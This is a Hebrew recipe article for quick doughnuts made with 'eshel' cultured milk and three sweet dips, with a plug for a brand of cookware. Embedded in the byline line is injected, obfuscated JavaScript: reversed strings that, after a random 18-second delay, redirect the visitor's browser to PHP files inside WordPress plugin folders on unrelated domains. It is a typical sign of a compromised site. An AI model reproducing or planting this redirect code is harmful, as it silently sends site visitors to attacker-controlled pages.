fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

סופגניות מושחתות במיוחד

מתכון קל להכנת סופגניות אשל עם שלושה מטבלים שונים | טרחה וכתבה: נועה קליין - I'm on Leave | צילם: גיא מועלם - Soul food pho$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tos
סופגניות אשל מושחתות | צילום: freepik.com
סופגניות אשל מושחתות | צילום: freepik.com

יש לנו חוק חדש בבית, אורן קבע אותו והוא בל יעבור: "אסור לנועה לטגן בשמן עמוק". הוא הטיל וטו אחרי שניצלים שיצאו טיפל'ה שחומים משמן שחרחר ומלא חלקיקים.

"את יודעת שאת מרעילה את הילדים", הוא אמר לי ואני נסוגתי בבושה מהמטבח.

מיד סימסתי לגיא מועלם מ- Soul food photos וביקשתי עזרה דחופה: "אני צריכה סדנת טיגון בבקשה", ומכיוון שגיא הוא איש נפלא, הוא מיד הסכים.

הוא הגיע מצויד במצלמה ומלא-מלא סבלנות ומיד שאל "מה מטגנים?".

"סופגניות, ברור".

יאללה, התחלנו.

שמתי את הסיר החדש שלי מסדרת VISIONS FLAIR של קורנינג על הכיריים.

"מה את עושה!?", גיא נחרד. מה שנתן לי את ההזדמנות המצוינת לשחק אותה פרזנטורית והסברתי לו בשביעות רצון שזהו סיר מטכנולוגיית חלל מתקדמת, מה שאומר, שאפשר לחמם אותו על הגז או בתנור ואפשר מיד להעביר אותו משם למקרר ואפילו למקפיא וההפך. הצלחתי להרשים אותו ומיד שפכנו את השמן פנימה.

לקח לנו איזה זמן למצוא את המתכון המושלם פלוס להבין את טכניקת טיגון הסופגניות, אבל כשזה התחיל לזרום, סופגניות נערמו שחומות ויפהפיות.

אני פה כדי לחלוק ידע, אז הנה המתכון המדהים לסופגניות אשל מושלמות.

שמחתי לגלות שהמתכון שייך לטליה הדר הנפלאה, שהיא כמובן בעלת הבלוג "אשת סטייל". וכדי להשחית את כל המעמד הכנו גם שלושה מטבלים מתוקים.

מתחילים.

מחממים שמן לטיגון על הלהבה הבינונית ומכניסים חצי כף מהבלילה בזו אחר זו
מחממים שמן לטיגון על הלהבה הבינונית ומכניסים חצי כף מהבלילה בזו אחר זו | צילום: גיא מועלם – Soul food photos

סופגניות אשל

המצרכים (30 מנות):

2 ביצים.

2 גביעי אשל.

כפית תמצית וניל.

כף סוכר.

350 גרם (3 כוסות חד פעמיות גדושות) קמח תופח.

אבקת סוכר.

אופן ההכנה:

  1. מערבבים את כל החומרים בקערה לפי הסדר.
  2. מחממים שמן לטיגון על הלהבה הבינונית.
  3. כשהשמן חם מספיק מנמיכים מעט את האש, ולוקחים מקערת הבלילה פחות מחצי כף. בעזרת כף נוספת מורידים בעדינות לתוך השמן.
  4. תוך חצי דקה בערך יתחילו להיווצר בסיר סופגניות קטנות ונפוחות. נותנים להן להיטגן בערך 3 דקות בכל צד. כדי להפוך, נוגעים בהן קלות בעזרת כף והן מתגלגלות מעצמן. את אלה שכבר מוכנות (תמיד יש כאלה זריזות יותר) מוציאים בעזרת כף מחוררת ומעבירים לצלחת המרופדת בנייר סופג.
  5. נותנים לסופגניות לנוח כמה דקות על הנייר הסופג, וכשהן מתקררות מעט מפזרים עליהן אבקת סוכר.
נותנים לסופגניות להיטגן בערך 3 דקות בכל צד
נותנים לסופגניות להיטגן בערך 3 דקות בכל צד | צילום: גיא מועלם – Soul food photos

עכשיו, המטבלים

נוצרה לנו ערימה מעוררת תאבון של סופגניות חמימות, הריח שהתפשט בבית היה משכר, אבל ניסינו לשלוט בעצמנו מספיק זמן כדי לצלם וכדי להכין את המטבלים. תהליך העבודה של כל המטבלים דומה רק החומרים משתנים.

המטבל הראשון הוא של הדס אלבק ופורסם ב"על השולחן", את השאר המצאתי לבד.

המצרכים לקרם קפה ואייריש קרים:

120 מ"ל (חצי כוס) שמנת מתוקה.

100 גרם שוקולד לבן קצוץ גס.

חצי כפית אבקת קפה נמס איכותית.

2 כפות אייריש קרם.

אופן ההכנה (מתאים להכנת כל המטבלים, רק החומרים משתנים):

  1. מחממים שמנת לסף רתיחה.
  2. יוצקים מעל שוקולד קצוץ וממתינים דקה.
  3. מערבבים ומוסיפים את שאר החומרים.
את הסופגניות המוכנות מוציאים בעזרת כף מחוררת ומעבירים לצלחת המרופדת בנייר סופג
את הסופגניות המוכנות מוציאים בעזרת כף מחוררת ומעבירים לצלחת המרופדת בנייר סופג | צילום: גיא מועלם – Soul food photos

המצרכים לקרם עוגיות:

5 עוגיות אוראו.

100 גרם שוקולד לבן קצוץ גס.

120 מ"ל (חצי כוס) שמנת מתוקה.

המצרכים לקרם שוקולד רובי ותותים:

6 תותים חתוכים לחתיכות קטנות.

100 גרם שוקולד רובי קצוץ גס.

120 מ"ל (חצי כוס) שמנת מתוקה.

  • הקרמים נשמרים כמה ימים במקרר. אפשר להגיש אותם קרים או לחמם כמה שניות במיקרוגל.

זהו, הכל מוכן ואפשר לטרוף הכל.

הילדים הגיעו מהגן ומבית הספר ומיד פערו עיניים למראה הסופגניות. הטבח היה בלתי נמנע.

חג שמח!

את סירי VISIONS FLAIR ניתן להשיג באתר חברת "שקל"

סיר מסדרת VISIONS FLAIR של קורנינג. החל מ-235 שקלים | צילום: יח"צ
סיר מסדרת VISIONS FLAIR של קורנינג. החל מ-235 שקלים | צילום: יח"צ

 

עוד חידושים, חדשים ומבצעים בסל של מיכל – כאן

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות